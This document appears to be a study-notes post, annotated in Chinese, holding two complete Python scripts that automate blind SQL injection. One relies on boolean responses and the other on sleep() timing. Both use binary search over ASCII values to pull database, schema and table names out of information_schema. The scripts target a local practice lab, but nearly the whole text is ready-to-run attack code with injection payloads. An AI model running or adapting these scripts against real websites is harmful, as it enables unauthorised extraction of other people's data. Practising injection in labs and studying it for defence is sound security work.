1.布尔盲注--方便以后修改,难点仅仅在于使用二分法求name
# 1.布尔盲注
# 页面有不同的响应word1,word2
# 可猜解数据库长度、个数、名字、表个数、表长度、名字、字段、
# 长度:length,order by
# 个数:count
# 名字:ascii,substr
import requests
import time
from math import ceil
class SqlInject(object):
headers = {
"headers":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
}
data= {}
@classmethod
def judge(cls,url):
if bool(SqlInject.data):
result = None
# print(result)
else:
result = requests.get(url=url,headers=SqlInject.headers,timeout=5).text
return result
def __init__(self,url,word1,word2):
self.url = url
self.word1=word1
self.word2=word2
#word1 in result we think you get result
def get_Current_Db_Len(self):
for i in range(1,20):
payload = "?id=1%27+and+(length(database())={})--+".format(i)
final_payload=self.url+payload
result = SqlInject.judge(final_payload)
if self.word1 in result:
print("database len:"+str(i)+"\n")
return i
#information db the number db
def get_All_Db_Len(self,Db_number):
for i in range(1,20):
payload = "?id=1%27+and+(select+((select+length(concat(schema_name))+from+information_schema.schemata+limit+{},1)={}))--+".format(Db_number,i)
final_payload=self.url+payload
result = SqlInject.judge(final_payload)
if self.word1 in result:
print("Database_len:"+str(i)+"\n")
return i
def get_All_Db_Number(self):
for i in range(1,20):
payload = "?id=1%27+and+(select+{}=(select count(*) from information_schema.schemata))--+".format(i)
final_payload=self.url+payload
result = SqlInject.judge(final_payload)
if self.word1 in result:
print("Db_number:"+str(i)+"\n")
return i
def get_Current_DbName(self):
table_list = []
#二分法获取数据库名
Namelen = self.get_Current_Db_Len()
TempLen = 0
DbName = ""
try:
while(True):
temp_bottom = 33
temp_top = 126
while(True):
#当前ascii小于temp_top
payload = "?id=1%27+and+((ascii(substr(database(),{},1))) < {})--+".format(TempLen+1,temp_top)
final_payload=self.url+payload
result = SqlInject.judge(final_payload)
# print(final_payload)
if self.word1 in result:
temp_top = (temp_top-ceil((temp_top-temp_bottom)/2))
#循环开始后上一次的两个边界之间的差值(作为bottom变化时的标记)
interval = ceil((temp_top-temp_bottom)/2)
continue
#当前ascii大于temp_top
payload = "?id=1%27+and+((ascii(substr(database(),{},1))) > {})--+".format(TempLen+1,temp_top)
final_payload=self.url+payload
result = SqlInject.judge(final_payload)
if self.word1 in result:
temp_bottom = temp_top
temp_top = temp_top + interval
continue
#当前ascii等于temp_top
payload = "?id=1%27+and+((ascii(substr(database(),{},1))) = {})--+".format(TempLen+1,temp_top)
final_payload=self.url+payload
result = SqlInject.judge(final_payload)
if interval == 0:
exit("unknown error about variable interval")
if self.word1 in result:
DbName += chr(temp_top)
print("Database_name:"+DbName)
TempLen += 1
break
if TempLen == Namelen:
table_list.append("Database_name:"+DbName)
break
except Exception as e:
print("Unknown error:",e)
return table_list
def get_All_Db_Name(self):
number = self.get_All_Db_Number()
Database_list = []
for i in range(0,number):
Database_Name = ""
#二分法获取每个数据库名
Namelen = self.get_All_Db_Len(i)
TempLen = 0
try:
while(True):
temp_bottom = 33
temp_top = 126
while(True):
#当前ascii小于temp_top
payload = "?id=1%27+and+(ascii(substr((select schema_name from information_schema.schemata limit {},1),{},1)) < {})--+".format(i,TempLen+1,temp_top)
final_payload=self.url+payload
result = SqlInject.judge(final_payload)
# print(final_payload)
if self.word1 in result:
temp_top = (temp_top-ceil((temp_top-temp_bottom)/2))
#循环开始后上一次的两个边界之间的差值(作为bottom变化时的标记)
interval = ceil((temp_top-temp_bottom)/2)
continue
#当前ascii大于temp_top
payload = "?id=1%27+and+(ascii(substr((select schema_name from information_schema.schemata limit {},1),{},1)) > {})--+".format(i,TempLen+1,temp_top)
final_payload=self.url+payload
result = SqlInject.judge(final_payload)
if self.word1 in result:
temp_bottom = temp_top
temp_top = temp_top + interval
continue
#当前ascii等于temp_top
payload = "?id=1%27+and+(ascii(substr((select schema_name from information_schema.schemata limit {},1),{},1)) = {})--+".format(i,TempLen+1,temp_top)
final_payload=self.url+payload
result = SqlInject.judge(final_payload)
if interval == 0:
exit("unknown error about variable interval")
if self.word1 in result:
Database_Name += chr(temp_top)
print("Database_name:"+Database_Name)
TempLen += 1
break
if TempLen == Namelen:
Database_list.append("Database_name:"+Database_Name)
break
except Exception as e:
print("Unknown error:",e)
return Database_list
def get_CurrentDb_Table_Number(self):
for i in range(1,20):
payload = "?id=1%27+and+(select+{}=(select+count(*)+from+information_schema.tables+where+table_schema=database()))--+".format(i)
final_payload=self.url+payload
result = SqlInject.judge(final_payload)
if self.word1 in result:
print("Table_number:"+str(i)+"\n")
return i
def get_CurrentDb_TableName_Len(self,table_number):
for i in range(1,20):
payload = "?id=1%27+and+(select+((select+length(concat(table_name))+from+information_schema.tables+where+table_schema=database()+limit+{},1)={}))--+".format(table_number,i)
final_payload=self.url+payload
result = SqlInject.judge(final_payload)
if self.word1 in result:
print("TableName_number:"+str(i)+"\n")
return i
def get_CurrentDb_Table_Name(self):
number = self.get_CurrentDb_Table_Number()
table_list = []
for i in range(0,number):
table_name = ""
#二分法获取每个表名
Namelen = self.get_CurrentDb_TableName_Len(i)
TempLen = 0
try:
while(True):
temp_bottom = 33
temp_top = 126
while(True):
#当前ascii小于temp_top
payload = "?id=1%27+and+(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1)) < {})--+".format(i,TempLen+1,temp_top)
final_payload=self.url+payload
result = SqlInject.judge(final_payload)
# print(final_payload)
if self.word1 in result:
temp_top = (temp_top-ceil((temp_top-temp_bottom)/2))
#循环开始后上一次的两个边界之间的差值(作为bottom变化时的标记)
interval = ceil((temp_top-temp_bottom)/2)
continue
#当前ascii大于temp_top
payload = "?id=1%27+and+(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1)) > {})--+".format(i,TempLen+1,temp_top)
final_payload=self.url+payload
result = SqlInject.judge(final_payload)
if self.word1 in result:
temp_bottom = temp_top
temp_top = temp_top + interval
continue
#当前ascii等于temp_top
payload = "?id=1%27+and+(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1)) = {})--+".format(i,TempLen+1,temp_top)
final_payload=self.url+payload
result = SqlInject.judge(final_payload)
if interval == 0:
exit("unknown error about variable interval")
if self.word1 in result:
table_name += chr(temp_top)
print("Table_name:"+table_name)
TempLen += 1
break
if TempLen == Namelen:
table_list.append("Table_name:"+table_name)
break
except Exception as e:
print("Unknown error:",e)
return table_list
def main():
url="http://127.0.0.1:8081/Less-8/"
word1="You are in"
word2="You are not in"
sqli = SqlInject(url=url,word1=word1,word2=word2)
one = float(time.time())
print(sqli.get_CurrentDb_Table_Name())
two = float(time.time())
interval = two-one
print(interval)
if __name__ == '__main__':
main()
2.时间盲注--方便以后修改,难点仅仅在于使用二分法求name
# 1.时间盲注
# 页面有不同的响应word1,word2
# 可猜解数据库长度、个数、名字、表个数、表长度、名字、字段、
# 长度:length,order by
# 个数:count
# 名字:ascii,substr
import requests
import time
from math import ceil
class SqlInject(object):
headers = {
"headers":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
}
data= {}
@classmethod
def judge(cls,url):
if bool(SqlInject.data):
result = None
# print(result)
else:
result = requests.get(url=url,headers=SqlInject.headers,timeout=5).text
return result
def __init__(self,url,word1,word2):
self.url = url
self.word1=word1
self.word2=word2
#word1 in result we think you get result
def get_Current_Db_Len(self):
for i in range(1,20):
payload = "?id=1+and+if(length(database())={},sleep(0.4),0)--+".format(i)
final_payload=self.url+payload
one = time.time()
result = SqlInject.judge(final_payload)
two = time.time()
interval = two-one
if interval >= 0.4:
print("Database len:"+str(i)+"\n")
return i
#information db the number db
def get_All_Db_Len(self,Db_number):
for i in range(1,20):
payload = "?id=1+and+if((select+length(concat(schema_name))+from+information_schema.schemata+limit+{},1)={},sleep(0.4),0)--+".format(Db_number,i)
final_payload=self.url+payload
one = time.time()
result = SqlInject.judge(final_payload)
two = time.time()
interval = two-one
if interval >= 0.4:
print("Database_len:"+str(i)+"\n")
return i
def get_All_Db_Number(self):
for i in range(1,20):
payload = "?id=1+and+if((select+count(*)+from+information_schema.schemata)={},sleep(1),0)--+".format(i)
final_payload=self.url+payload
one = time.time()
result = SqlInject.judge(final_payload)
two = time.time()
interval = two-one
if interval >= 1:
#解决可能由于网速引起的错误
if i == 1:
self.get_All_Db_Number()
print("Db_number:"+str(i)+"\n")
return i
def get_Current_DbName(self):
table_list = []
#二分法获取数据库名
Namelen = self.get_Current_Db_Len()
TempLen = 0
DbName = ""
try:
while(True):
temp_bottom = 33
temp_top = 126
interval = ceil((temp_top-temp_bottom)/2)
while(True):
#当前ascii小于temp_top
payload = "?id=1+and+if(ascii(substr(database(),{},1)) < {},sleep(0.4),0)--+".format(TempLen+1,temp_top)
final_payload=self.url+payload
one = time.time()
result = SqlInject.judge(final_payload)
two = time.time()
time_interval = two-one
if time_interval >= 0.4:
temp_top = (temp_top-ceil((temp_top-temp_bottom)/2))
#循环开始后上一次的两个边界之间的差值(作为bottom变化时的标记)
interval = ceil((temp_top-temp_bottom)/2)
continue
#当前ascii大于temp_top
payload = "?id=1+and+if(ascii(substr(database(),{},1)) > {},sleep(0.4),0)--+".format(TempLen+1,temp_top)
final_payload=self.url+payload
one = time.time()
result = SqlInject.judge(final_payload)
two = time.time()
time_interval = two-one
if time_interval >= 0.4:
temp_bottom = temp_top
temp_top = temp_top + interval
continue
#当前ascii等于temp_top
payload = "?id=1+and+if(ascii(substr(database(),{},1)) = {},sleep(0.4),0)--+".format(TempLen+1,temp_top)
final_payload=self.url+payload
one = time.time()
result = SqlInject.judge(final_payload)
two = time.time()
time_interval = two-one
if time_interval >= 0.4:
DbName += chr(temp_top)
print("Database_name:"+DbName)
TempLen += 1
break
if TempLen == Namelen:
table_list.append("Database_name:"+DbName)
break
except Exception as e:
print("Unknown error:",e)
return table_list
def get_All_Db_Name(self):
number = self.get_All_Db_Number()
Database_list = []
for i in range(0,number):
Database_Name = ""
#二分法获取每个数据库名
Namelen = self.get_All_Db_Len(i)
TempLen = 0
try:
while(True):
temp_bottom = 33
temp_top = 126
interval = ceil((temp_top-temp_bottom)/2)
while(True):
#当前ascii小于temp_top
payload = "?id=1+and+if(ascii(substr((select schema_name from information_schema.schemata limit {},1),{},1)) < {},sleep(0.4),0)--+".format(i,TempLen+1,temp_top)
final_payload=self.url+payload
one = time.time()
result = SqlInject.judge(final_payload)
two = time.time()
time_interval = two-one
if time_interval >= 0.4:
temp_top = (temp_top-ceil((temp_top-temp_bottom)/2))
#循环开始后上一次的两个边界之间的差值(作为bottom变化时的标记)
interval = ceil((temp_top-temp_bottom)/2)
continue
#当前ascii大于temp_top
payload = "?id=1+and+if(ascii(substr((select schema_name from information_schema.schemata limit {},1),{},1)) > {},sleep(0.4),0)--+".format(i,TempLen+1,temp_top)
final_payload=self.url+payload
one = time.time()
result = SqlInject.judge(final_payload)
two = time.time()
time_interval = two-one
if time_interval >= 0.4:
temp_bottom = temp_top
temp_top = temp_top + interval
continue
#当前ascii等于temp_top
payload = "?id=1+and+if(ascii(substr((select schema_name from information_schema.schemata limit {},1),{},1)) = {},sleep(0.4),0)--+".format(i,TempLen+1,temp_top)
final_payload=self.url+payload
one = time.time()
result = SqlInject.judge(final_payload)
two = time.time()
time_interval = two-one
if time_interval >= 0.4:
Database_Name += chr(temp_top)
print("Database_name:"+Database_Name)
TempLen += 1
break
if TempLen == Namelen:
Database_list.append("Database_name:"+Database_Name)
break
except Exception as e:
print("Unknown error:",e)
return Database_list
def get_CurrentDb_Table_Number(self):
for i in range(1,100):
payload = "?id=1+and+if((select count(*) from information_schema.tables where table_schema =database()) = {},sleep(0.4),0)--+".format(i)
final_payload=self.url+payload
one = time.time()
result = SqlInject.judge(final_payload)
two = time.time()
interval = two-one
if interval >= 0.4:
print("TableNumber:"+str(i)+"\n")
return i
def get_CurrentDb_Table_Len(self,table_number):
for i in range(1,20):
payload = "?id=1+and+if((select+length(concat(table_name))+from+information_schema.tables where table_schema=database()+limit+{},1)={},sleep(0.4),0)--+".format(table_number,i)
final_payload=self.url+payload
one = time.time()
result = SqlInject.judge(final_payload)
two = time.time()
interval = two-one
if interval >= 0.4:
print("TableName_len:"+str(i)+"\n")
return i
def get_CurrentDb_Table_Name(self):
number = self.get_CurrentDb_Table_Number()
Table_list = []
for i in range(0,number):
Table_Name = ""
#二分法获取每个数据库名
Namelen = self.get_CurrentDb_Table_Len(i)
TempLen = 0
try:
while(True):
temp_bottom = 33
temp_top = 126
interval = ceil((temp_top-temp_bottom)/2)
while(True):
#当前ascii小于temp_top
payload = "?id=1+and+if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1)) < {},sleep(0.4),0)--+".format(i,TempLen+1,temp_top)
final_payload=self.url+payload
one = time.time()
result = SqlInject.judge(final_payload)
two = time.time()
time_interval = two-one
if time_interval >= 0.4:
temp_top = (temp_top-ceil((temp_top-temp_bottom)/2))
#循环开始后上一次的两个边界之间的差值(作为bottom变化时的标记)
interval = ceil((temp_top-temp_bottom)/2)
continue
#当前ascii大于temp_top
payload = "?id=1+and+if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1)) > {},sleep(0.4),0)--+".format(i,TempLen+1,temp_top)
final_payload=self.url+payload
one = time.time()
result = SqlInject.judge(final_payload)
two = time.time()
time_interval = two-one
if time_interval >= 0.4:
temp_bottom = temp_top
temp_top = temp_top + interval
continue
#当前ascii等于temp_top
payload = "?id=1+and+if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1)) = {},sleep(0.4),0)--+".format(i,TempLen+1,temp_top)
final_payload=self.url+payload
one = time.time()
result = SqlInject.judge(final_payload)
two = time.time()
time_interval = two-one
if time_interval >= 0.4:
Table_Name += chr(temp_top)
print("Table_name:"+Table_Name)
TempLen += 1
break
if TempLen == Namelen:
Table_list.append("Table_name:"+Table_Name)
break
except Exception as e:
print("Unknown error:",e)
return Table_list
def main():
url="http://127.0.0.1:8081/Less-2/"
word1="You are in"
word2="You are not in"
sqli = SqlInject(url=url,word1=word1,word2=word2)
one = float(time.time())
print(sqli.get_All_Db_Name())
two = float(time.time())
interval = two-one
print(interval)
if __name__ == '__main__':
main()
